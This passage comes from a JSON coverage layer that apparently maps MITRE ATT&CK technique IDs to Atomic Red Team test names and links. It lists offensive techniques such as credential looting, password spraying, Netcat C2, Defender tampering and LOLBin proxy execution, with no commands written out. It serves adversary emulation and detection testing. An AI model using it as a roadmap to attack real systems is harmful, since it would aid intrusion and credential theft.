Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - 
Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users 
Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase 
Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":12,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":4,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n- ESXi - Brute Force Until Account Lockout\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry 
Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote 
Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data 
via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild 
Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current 
Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.001","score":1,"enabled":true,"comment":"\n- Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- 
OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product 
Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with 
